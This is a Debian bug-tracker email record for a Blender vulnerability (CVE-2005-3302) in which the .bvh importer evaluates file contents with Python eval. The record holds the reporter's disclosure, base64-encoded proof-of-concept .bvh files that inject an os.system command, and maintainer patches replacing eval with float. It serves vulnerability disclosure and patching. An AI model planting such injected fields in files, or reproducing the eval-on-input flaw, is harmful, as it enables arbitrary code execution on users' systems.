Your message dated Wed, 16 Nov 2005 15:54:07 +0100 with message-id <[EMAIL PROTECTED]> and subject line Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -------------------------------------- Received: (at submit) by bugs.debian.org; 30 Sep 2005 10:35:40 +0000 >From [EMAIL PROTECTED] Fri Sep 30 03:35:40 2005 Return-path: <[EMAIL PROTECTED]> Received: from smtp106.mail.sc5.yahoo.com [66.163.169.226] by spohr.debian.org with smtp (Exim 3.36 1 (Debian)) id 1ELIEu-0002iM-00; Fri, 30 Sep 2005 03:35:40 -0700 Received: (qmail 97672 invoked from network); 30 Sep 2005 10:35:39 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.es; h=Received:Subject:From:To:Content-Type:Date:Message-Id:Mime-Version:X-Mailer; b=4wYOFP+EotJRumRWsjkVCPy/fSrk2JymO2baE+VDx6qnPOREQq1RDRHIr3W5iKJQgDf+ooa1dWCuIsMALRkC29cmac+LIdFOCXKBLdBr32U0lQoDil4Htq2qsST6rwurAcoxOtqxJzK9K6Fuy6tOe0s/yLkPpT2SreYXP4u82hA= ; Received: from unknown (HELO ?192.168.1.5?) ([EMAIL PROTECTED] with plain) by smtp106.mail.sc5.yahoo.com with SMTP; 30 Sep 2005 10:35:38 -0000 Subject: blender: Arbitrary code execution when importing a .bvh file From: Joxean Koret <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-3gjzVCLQTlWu2kr0pk8a" Date: Fri, 30 Sep 2005 12:51:35 +0200 Message-Id: <[EMAIL PROTECTED]> Mime-Version: 1.0 X-Mailer: Evolution 2.0.4 Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no version=2.60-bugs.debian.org_2005_01_02 --=-3gjzVCLQTlWu2kr0pk8a Content-Type: multipart/mixed; boundary="=-HbkGIVJARM52mmemKKWz" --=-HbkGIVJARM52mmemKKWz Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Subject: blender: Arbitrary code execution when importing a .bvh file Package: blender Version: 2.36-1 Severity: grave Justification: user security hole The bvh_import.py script supplied with the current Debian Stable and (I think) unstable versions of Blender is vulnerable to arbitrary code execution. The problem was corrected at 2005/01/22 in the CVS but the main package=20 doesn't come with the fixed script. Attached goes the e-mail sended to the Blender people, one working exploit to test the vulnerability under Debian, and 2 proof of concepts. Regards, Joxean Koret -- System Information: Debian Release: 3.1 Architecture: i386 (i686) Kernel: Linux 2.6.11-1-386 Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=3DISO-8859-15) Versions of packages blender depends on: ii gettext [libg 0.14.4-2 GNU Internationalization utilities ii libc6 2.3.2.ds1-22 GNU C Library: Shared libraries an ii libfreetype6 2.1.7-2.4 FreeType 2 font engine, shared lib ii libgcc1 1:3.4.3-13 GCC support library ii libjpeg62 6b-10 The Independent JPEG Group's JPEG=20 ii libopenal0 0.2004090900-1.1 OpenAL is a portable library for 3 ii libpng12-0 1.2.8rel-1 PNG library - runtime ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer ii libstdc++5 1:3.3.5-13 The GNU Standard C++ Library v3 ii libx11-6 4.3.0.dfsg.1-14 X Window System protocol client li ii python2.3 2.3.5-4 An interactive high-level object-o ii xlibmesa-gl [ 4.3.0.dfsg.1-14 Mesa 3D graphics library [XFree86] ii xlibmesa-glu 4.3.0.dfsg.1-14 Mesa OpenGL utility library [XFree ii xlibs 4.3.0.dfsg.1-14 X Keyboard Extension (XKB) configu ii zlib1g 1:1.2.2-4.sarge.2 compression library - runtime -- no debconf information --=-HbkGIVJARM52mmemKKWz Content-Disposition: attachment; filename=exploit.bvh Content-Type: text/plain; name=exploit.bvh; charset=ISO-8859-15 Content-Transfer-Encoding: base64 SElFUkFSQ0hZDQpST09UIEpveGVhbg0Kew0KICBPRkZTRVQgX19pbXBvcnRfXygnb3MnKS5zeXN0 ZW0oJ3RvdWNoJytjaHIoMzIpKycvdG1wL2J2aF9pbXBvcnRfZXhwbG9pdCcpICAwLjAwMDAwMCAg MC4wMDAwMDAgDQp9DQpNT1RJT04NCkZyYW1lczogMjUwDQpGcmFtZSBUaW1lOiAwLjMzMzMwMCAN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0K DQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoN Cg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQoNCg0KDQo= --=-HbkGIVJARM52mmemKKWz Content-Disposition: attachment; filename=first.mail.txt Content-Type: text/plain; name=first.mail.txt; charset=ISO-8859-15 Content-Transfer-Encoding: base64 SGkhDQoNCglJIGhhdmUgYmVlbiBmb3VuZCBhIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdHkgaW4gQmxl bmRlciB0aGF0IGFsbG93cyB0bw0KZXhlY3V0ZSBhcmJpdHJhcnkgY29kZSB3aGVuIHRyeWluZyB0 byBpbXBvcnQgYSAuYnZoIGZpbGUuIFRoZSBwcm9ibGVtIGlzIHRoZQ0KZm9sbG93aW5nOg0KDQoJ VGhlIHZ1bG5lcmFibGUgbW9kdWxlIGlzIGEgcHl0aG9uIHBsdWdpbi4gVGhpcyBwbHVnaW4gcGFy c2VzIHRoZSAuYnZoDQpmaWxlcyBhbmQgY3JlYXRlcyB0aGUgY29ycmVzcG9uZGllbnQgb2JqZWN0 cyBmb3IgQmxlbmRlci4gVGhlIHByb2JsZW0gaXMgaW4gdGhlDQpmaWxlcyBidmhfaW1wb3J0LnB5 IGFuZCBidmhfZXhwb3J0LnB5IGJ1dCBpdCBpcyAicHJlc3VtYWJseSIgb25seSBleHBsb2l0YWJs ZSANCndoZW4gaW1wb3J0aW5nIC5idmggZmlsZXMsIG5vdCB3aGVuIGV4cG9ydGluZy4NCg0KCVRh a2luZyBhIGxvb2sgdG8gdGhlIGJ2aF9pbXBvcnQucHkgZmlsZSBJIGhhdmUgYmVlbiBmb3VuZCB2 YXJpb3VzIHB5dGhvbiANCiJldmFsIiBjYWxscyBhcm91bmQgdGhlIGxpbmVzIDMzNCBhbmQgMzcw LiBUaGUgcHl0aG9uICJldmFsIiBjYWxsIGlzIEVWSUwgYW5kIA0Kc2hvdWxkIG5vdCBiZSB1c2Vk IG5vcm1hbGx5LiBBbnl3YXksIHRoZSBzb3VyY2UgY29kZSBvZiB0aGUgcGx1Z2lucyBsb29rcyBh cw0KZm9sbG93czoNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KMzIxICAgY2hhbm5l bExpc3QgPSBbXQ0KMzIyICAgY2hhbm5lbEluZGV4ID0gLTENCjMyMyAgIA0KMzI0ICAgbGluZUlk eCA9IDEgIyBBbiBpbmRleCBmb3IgdGhlIGZpbGUuDQozMjUgICB3aGlsZSBsaW5lSWR4IDwgbGVu KGxpbmVzKSAtMToNCjMyNiAgICAgIy4uLg0KMzI3ICAgICBpZiBsaW5lc1tsaW5lSWR4XVswXSA9 PSAnUk9PVCcgb3IgbGluZXNbbGluZUlkeF1bMF0gPT0gJ0pPSU5UJzoNCjMyOCAgICAgICAjIE1B WSBORUVEIFRPIFNVUFBPUlQgTVVMVElQTEUgUk9PVCdzIEhFUkUhISEsIFN0aWxsIHVuc3VyZSB3 ZWF0aGVyIG11bHRpcGxlIHJvb3RzIGFyZSBwb3NzaWJsZS4/Pw0KMzI5DQozMzAgICAgICAgcHJp bnQgbGVuKHBhcmVudCkgKiAnICAnICsgJ25vZGU6JyxsaW5lc1tsaW5lSWR4XVsxXSwnIHBhcmVu dDonLHBhcmVudFstMV0NCjMzMSAgICAgICANCjMzMiAgICAgICBuYW1lID0gbGluZXNbbGluZUlk eF1bMV0NCjMzMyAgICAgICBsaW5lSWR4ICs9IDIgIyBJbmNyaW1lbnQgdG8gdGhlIG5leHQgbGlu ZSAoT2Zmc2V0KQ0KMzM0ICAgICAgIG9mZnNldCA9ICggZXZhbChsaW5lc1tsaW5lSWR4XVsxXSks IGV2YWwobGluZXNbbGluZUlkeF1bMl0pLCBldmFsKGxpbmVzW2xpbmVJZHhdWzNdKSApDQozMzUg ICAgICAgbGluZUlkeCArPSAxICMgSW5jcmltZW50IHRvIHRoZSBuZXh0IGxpbmUgKENoYW5uZWxz KQ0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQoJQXMgd2UgY2FuIHNlZSB0aGUgc2Vj b25kIChsaW5lc1tsaW5lSWR4XVsxXSksIHRoaXJkIChsaW5lc1tsaW5lSWR4XVsyXSkgYW5kDQpm b3VydGggd29yZCBvZiB0aGUgcGFyc2VkIGxpbmUgd2lsbCBiZSBldmFsZWQgdG8gZ2V0IHRoZSBY LCBZIGFuZCBaIHZhbHVlcyBvZiB0aGUgDQpvYmplY3QgYnV0LCB3aGF0IGFib3V0IGlmIHRoaXMg aXMgbm90IGEgbnVtYmVyPyBJZiBpdCdzIG1hbGljaW91cyBweXRob24gY29kZT8gT25lDQpzYW1w bGU6DQoNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCjAxIEhJRVJBUkNIWQ0KMDIgUk9P VCBuYW1lIDEgMg0KMDMgDQowNCAxIDIgMyA0DQowNSAxIF9faW1wb3J0X18oJ29zJykuc3lzdGVt KCd0b3VjaCcrY2hyKDMyKSsnL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQnKSAzIDQNCjA2IA0KMDcg DQowOCANCjA5IA0KMTANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KCVRoZSBzZWNv bmQgd29yZCBvZiB0aGUgNXRoIGxpbmUgaXMgYSBjb3JyZWN0IGZyYWdtZW50IG9mIHB5dGhvbiBj b2RlLiBXaGVuIHRoZQ0KcGx1Z2luIHRyaWVzIHRvIHBhcnNlIHRoZSAuYnZoIGZpbGUgdGhlIGNv ZGUgX19pbXBvcnRfXygnb3MnKS4uLiwgd2lsbCBiZSBldmFsZWQgYW5kIA0KdGhlIGZpbGUgL3Rt cC9idmhfaW1wb3J0X2V4cGxvaXQgd2lsbCBiZSBjcmVhdGVkLiBCdXQsIEkgZG9uJ3Qga25vd24g d2h5LCB0aGlzIHByb29mDQpvZiBjb25jZXB0IGRvZXNuJ3Qgd29yayBvbiBteSBtYWNoaW5lIHNv IEkgY3JlYXRlZCBhIHZhbGlkIGV4cGxvaXQgdGhhdCBCbGVuZGVyIGltcG9ydHMNCndpdGhvdXQg YW55IGVycm9yIGFuZC9vciB3YXJuaW5ncyBhbmQgY3JlYXRlcyB0aGUgZmlsZSAvdG1wL2J2aF9p bXBvcnRfZXhwbG9pdC4gQXR0YWNoZWQNCmdvZXMgYSB2YWxpZCBleHBsb2l0IGNhbGxlZCBleHBs b2l0LmJ2aCB0aGF0IGNyZWF0ZXMgdGhlIGZpbGUgL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQuDQoN Ck5PVEU6IFRoaXMgdnVsbmVyYWJpbGl0eSBpcyBleHBsb2l0YWJsZSBpbiBhbnkgb2YgdGhlIEJs ZW5kZXIgc3VwcG9ydGVkIHBsYXR0Zm9ybXMuDQoNClJlZ2FyZHMsDQpKb3hlYW4gS29yZXQ= --=-HbkGIVJARM52mmemKKWz Content-Disposition: attachment; filename=poc1.bvh Content-Type: text/plain; name=poc1.bvh; charset=ISO-8859-15 Content-Transfer-Encoding: base64 SElFUkFSQ0hZDQpFbmQgU2l0ZQ0KDQoxIF9faW1wb3J0X18oJ29zJykuc3lzdGVtKCd0b3VjaCcr Y2hyKDMyKSsnL3RtcC9idmhfaW1wb3J0X2V4cGxvaXQnKSAzIDQ= --=-HbkGIVJARM52mmemKKWz Content-Disposition: attachment; filename=poc2.bvh Content-Type: text/plain; name=poc2.bvh; charset=ISO-8859-15 Content-Transfer-Encoding: base64 SElFUkFSQ0hZDQpST09UIG5hbWUgMSAyDQoNCjEgMiAzIDQNCjEgX19pbXBvcnRfXygnb3MnKS5z eXN0ZW0oJ3RvdWNoJytjaHIoMzIpKycvdG1wL2J2aF9pbXBvcnRfZXhwbG9pdCcpIDMgNA== --=-HbkGIVJARM52mmemKKWz-- --=-3gjzVCLQTlWu2kr0pk8a Content-Type: application/pgp-signature; name=signature.asc Content-Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQBDPRi3U6rFMEYDrlERAvz3AJ9cnmsKHbR83dG3Pe0PEZtBe4+3UgCgmVT3 nDFtJMVrV537iy05hubq1Zg= =EApH -----END PGP SIGNATURE----- --=-3gjzVCLQTlWu2kr0pk8a-- ______________________________________________ Renovamos el Correo Yahoo! Nuevos servicios, más seguridad http://correo.yahoo.es --------------------------------------- Received: (at 330895-done) by bugs.debian.org; 16 Nov 2005 14:54:16 +0000 >From [EMAIL PROTECTED] Wed Nov 16 06:54:16 2005 Return-path: <[EMAIL PROTECTED]> Received: from relay2.uni-heidelberg.de ([129.206.210.211]) by spohr.debian.org with esmtp (Exim 4.50) id 1EcOfw-0007My-7n for [EMAIL PROTECTED]; Wed, 16 Nov 2005 06:54:16 -0800 Received: from ix.urz.uni-heidelberg.de (popix.urz.uni-heidelberg.de [129.206.119.235]) by relay2.uni-heidelberg.de (8.12.10/8.12.10) with ESMTP id jAGEsPM0011503; Wed, 16 Nov 2005 15:54:25 +0100 (MET) Received: from extmail.urz.uni-heidelberg.de (extmail.urz.uni-heidelberg.de [129.206.100.140]) by ix.urz.uni-heidelberg.de (8.8.8/8.8.8) with ESMTP id PAA5955818; Wed, 16 Nov 2005 15:54:11 +0100 Received: from live (p54A713D9.dip0.t-ipconnect.de [84.167.19.217]) (authenticated bits=0) by extmail.urz.uni-heidelberg.de (8.13.4/8.13.1) with ESMTP id jAGEsiuI014072 (version=TLSv1/SSLv3 cipher=AES256-SHA bits=256 verify=NO); Wed, 16 Nov 2005 15:54:45 +0100 Received: from fernst by live with local (Exim 4.54) id 1EcOfo-00014q-Eg; Wed, 16 Nov 2005 15:54:08 +0100 Date: Wed, 16 Nov 2005 15:54:07 +0100 To: [EMAIL PROTECTED] Subject: Re: Bug#330895: [CVE-2005-3302] blender: Arbitrary code execution when importing a .bvh file Message-ID: <[EMAIL PROTECTED]> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="rCIC/fLAoyeCowUM" Content-Disposition: inline In-Reply-To: <[EMAIL PROTECTED]> User-Agent: Mutt/1.5.9i From: Florian Ernst <[EMAIL PROTECTED]> X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER autolearn=no version=2.60-bugs.debian.org_2005_01_02 --rCIC/fLAoyeCowUM Content-Type: multipart/mixed; boundary="4XGXW98AkZ9Jbbyi" Content-Disposition: inline --4XGXW98AkZ9Jbbyi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Package: blender Version: 2.37a-1 Dear Security Team, as this package's maintainer hasn't shown any visible reaction to this issue I now try to take care... On Fri, 30 Sep 2005 12:51:35 +0200, Joxean Koret wrote: > The bvh_import.py script supplied with the current Debian Stable and (I > think) unstable versions of Blender is vulnerable to arbitrary code > execution. I can confirm that this particular vulnerability could trick a user into executing arbitrary commands with his rights. All an attacker has to do is to provide a specially crafted bvh file (used for Motion Capture data) for the user to import into a blender scene, and all commands contained therein will be executed in the user's environment. The demo exploit attached to Joxean's mail works under blender-2.36. Oldstable (2.23-0.1) isn't affected as it shipped a version of blender that didn't include this script yet (and was in non-free). Stable (2.36-1) is affected, I've attached two patches that remove all 'eval's in the script, which in fact basically is what upstream did. The first patch (CVE-2005-3302_upstream_dpatch.diff) essentially contains what upstream did to resolve this issue, while the second patch (CVE-2005-3302_dpatch.diff) contains what I considered to be a minimal set of changes to remove this particular vulnerability. Please see <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scripts/bvh_import.py.diff?r1=1.4&r2=1.5&cvsroot=bf-blender> for upstream details. I can confirm that these changes prevent the exploit of this vulnerability, tested on both blender-2.36 and 2.37a Testing isn't affected anymore as blender has been removed from Testing due to general bugginess. Unstable was partially affected: while 2.37a-1 already included the upstream fix for this problem this version hadn't been built on all archs due to bug#333958. However, this FTBFS has been resolved as of 2.37a-1.1, so right now all versions currently present in Unstable are _not_ vulnerable. Consequently I now close this bug for the corresponding version in Unstable with this mail. Please issue an update for Stable when you think it is due time. HTH, Flo --4XGXW98AkZ9Jbbyi Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="CVE-2005-3302_upstream_dpatch.diff" Content-Transfer-Encoding: quoted-printable diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li= st --- blender-2.36/debian/patches/00list +++ blender-2.36/debian/patches/00list @@ -2,0 +3 @@ +03_fix_arbitrary_code_execution_in_bvh_import.py diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog --- blender-2.36/debian/changelog +++ blender-2.36/debian/changelog @@ -1,3 +1,12 @@ +blender (2.36-1sarge1) stable-security; urgency=3Dhigh + + * patch release/scripts/bvh_import.py to use float instead of eval by + adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch, + thus preventing arbitrary code execution when importing a .bvh file; + for reference, this is CVE-2005-3302 - closes: #330895 + + -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 15:03:10 +0100 + blender (2.36-1) unstable; urgency=3Dhigh =20 * The "Back From The Gig" release. only in patch2: unchanged: --- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh= _import.py.dpatch +++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo= rt.py.dpatch @@ -0,0 +1,67 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns= t <[EMAIL PROTECTED]> +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Fix for CVE-2005-3302, see bug#330895 and +## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc= ripts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender> +## DP: <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/sc= ripts/bvh_import.py.diff?r1=3D1.6&r2=3D1.7&cvsroot=3Dbf-blender> + [EMAIL PROTECTED]@ +diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea= se/scripts/bvh_import.py +--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07 17:31:13.000000= 000 +0100 ++++ blender-2.36/release/scripts/bvh_import.py 2005-11-16 15:08:35.0000000= 00 +0100 +@@ -331,7 +331,7 @@ + =20 + name =3D lines[lineIdx][1] + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + lineIdx +=3D 1 # Incriment to the next line (Channels) + =20 + # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,= Zrotation] +@@ -367,7 +367,7 @@ + # Account for an end node + if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'= : # There is somtimes a name afetr 'End Site' but we will ignore it. + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + makeEnd(parent, prefix, offset) +=20 + # Just so we can remove the Parents in a uniform way- End end never= has kids +@@ -431,14 +431,32 @@ + if debug: Blender.Redraw()=20 + while obIdx < len(objectList) -1: + if channelList[obIdx][0] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]]))) ++ VAL0=3Dlines[lineIdx][channelList[obIdx][0]] ++ if VAL0.find('.')=3D=3D-1: ++ VAL0=3DVAL0[:len(VAL0)-6]+'.'+VAL0[-6:] ++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * float(VAL0))) + if channelList[obIdx][1] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]]))) ++ VAL1=3Dlines[lineIdx][channelList[obIdx][1]] ++ if VAL1.find('.')=3D=3D-1: ++ VAL1=3DVAL1[:len(VAL1)-6]+'.'+VAL1[-6:] ++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * float(VAL1))) + if channelList[obIdx][2] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]]))) ++ VAL2=3Dlines[lineIdx][channelList[obIdx][2]] ++ if VAL2.find('.')=3D=3D-1: ++ VAL2=3DVAL2[:len(VAL2)-6]+'.'+VAL2[-6:] ++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * float(VAL2))) + =20 + if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] != =3D '-1' or channelList[obIdx][5] !=3D '-1': +- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx= ][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch= annelList[obIdx][5]])) ++ VAL3=3Dlines[lineIdx][channelList[obIdx][3]] ++ if VAL3.find('.')=3D=3D-1: ++ VAL3=3DVAL3[:len(VAL3)-6]+'.'+VAL3[-6:] ++ VAL4=3Dlines[lineIdx][channelList[obIdx][4]] ++ if VAL4.find('.')=3D=3D-1: ++ VAL4=3DVAL4[:len(VAL4)-6]+'.'+VAL4[-6:] ++ VAL5=3Dlines[lineIdx][channelList[obIdx][5]] ++ if VAL5.find('.')=3D=3D-1: ++ VAL5=3DVAL5[:len(VAL5)-6]+'.'+VAL5[-6:] ++ x, y, z =3D eulerRotate(float(VAL3), float(VAL4), float(VAL5)) + objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren= tFrame, x)) + objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren= tFrame, y)) + objectList[obIdx].getIpo().getCurve('RotZ').addBezier((curren= tFrame, z)) --4XGXW98AkZ9Jbbyi Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="CVE-2005-3302_dpatch.diff" Content-Transfer-Encoding: quoted-printable diff -u blender-2.36/debian/patches/00list blender-2.36/debian/patches/00li= st --- blender-2.36/debian/patches/00list +++ blender-2.36/debian/patches/00list @@ -2,0 +3 @@ +03_fix_arbitrary_code_execution_in_bvh_import.py diff -u blender-2.36/debian/changelog blender-2.36/debian/changelog --- blender-2.36/debian/changelog +++ blender-2.36/debian/changelog @@ -1,3 +1,15 @@ +blender (2.36-1sarge1) stable-security; urgency=3Dhigh + + * patch release/scripts/bvh_import.py to use float instead of eval by + adding 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch, + thus preventing arbitrary code execution when importing a .bvh file; + this fix differs from the changes in + <http://projects.blender.org/viewcvs/viewcvs.cgi/blender/release/scrip= ts/bvh_import.py.diff?r1=3D1.4&r2=3D1.5&cvsroot=3Dbf-blender> + in that it doesn't provide the new checks introduced therein; + for reference, this is CVE-2005-3302 - closes: #330895 + + -- Florian Ernst <[EMAIL PROTECTED]> Wed, 16 Nov 2005 14:45:57 +0100 + blender (2.36-1) unstable; urgency=3Dhigh =20 * The "Back From The Gig" release. only in patch2: unchanged: --- blender-2.36.orig/debian/patches/03_fix_arbitrary_code_execution_in_bvh= _import.py.dpatch +++ blender-2.36/debian/patches/03_fix_arbitrary_code_execution_in_bvh_impo= rt.py.dpatch @@ -0,0 +1,47 @@ +#! /bin/sh /usr/share/dpatch/dpatch-run +## 03_fix_arbitrary_code_execution_in_bvh_import.py.dpatch by Florian Erns= t <[EMAIL PROTECTED]> +## +## All lines beginning with `## DP:' are a description of the patch. +## DP: Fix for CVE-2005-3302, see bug#330895 + [EMAIL PROTECTED]@ +diff -urNad blender-2.36~/release/scripts/bvh_import.py blender-2.36/relea= se/scripts/bvh_import.py +--- blender-2.36~/release/scripts/bvh_import.py 2004-11-07 17:31:13.000000= 000 +0100 ++++ blender-2.36/release/scripts/bvh_import.py 2005-11-02 13:36:01.0000000= 00 +0100 +@@ -331,7 +331,7 @@ + =20 + name =3D lines[lineIdx][1] + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + lineIdx +=3D 1 # Incriment to the next line (Channels) + =20 + # newChannel[Xposition, Yposition, Zposition, Xrotation, Yrotation,= Zrotation] +@@ -367,7 +367,7 @@ + # Account for an end node + if lines[lineIdx][0] =3D=3D 'End' and lines[lineIdx][1] =3D=3D 'Site'= : # There is somtimes a name afetr 'End Site' but we will ignore it. + lineIdx +=3D 2 # Incriment to the next line (Offset) +- offset =3D ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]), eval= (lines[lineIdx][3]) ) ++ offset =3D ( float(lines[lineIdx][1]), float(lines[lineIdx][2]), fl= oat(lines[lineIdx][3]) ) + makeEnd(parent, prefix, offset) +=20 + # Just so we can remove the Parents in a uniform way- End end never= has kids +@@ -431,14 +431,14 @@ + if debug: Blender.Redraw()=20 + while obIdx < len(objectList) -1: + if channelList[obIdx][0] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][0]]))) ++ objectList[obIdx].getIpo().getCurve('LocX').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][0]]))) + if channelList[obIdx][1] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][1]]))) ++ objectList[obIdx].getIpo().getCurve('LocY').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][1]]))) + if channelList[obIdx][2] !=3D -1: +- objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * eval(lines[lineIdx][channelList[obIdx][2]]))) ++ objectList[obIdx].getIpo().getCurve('LocZ').addBezier((curren= tFrame, scale * float(lines[lineIdx][channelList[obIdx][2]]))) + =20 + if channelList[obIdx][3] !=3D '-1' or channelList[obIdx][4] != =3D '-1' or channelList[obIdx][5] !=3D '-1': +- x, y, z =3D eulerRotate(eval(lines[lineIdx][channelList[obIdx= ][3]]), eval(lines[lineIdx][channelList[obIdx][4]]), eval(lines[lineIdx][ch= annelList[obIdx][5]])) ++ x, y, z =3D eulerRotate(float(lines[lineIdx][channelList[obId= x][3]]), float(lines[lineIdx][channelList[obIdx][4]]), float(lines[lineIdx]= [channelList[obIdx][5]])) + objectList[obIdx].getIpo().getCurve('RotX').addBezier((curren= tFrame, x)) + objectList[obIdx].getIpo().getCurve('RotY').addBezier((curren= tFrame, y)) + 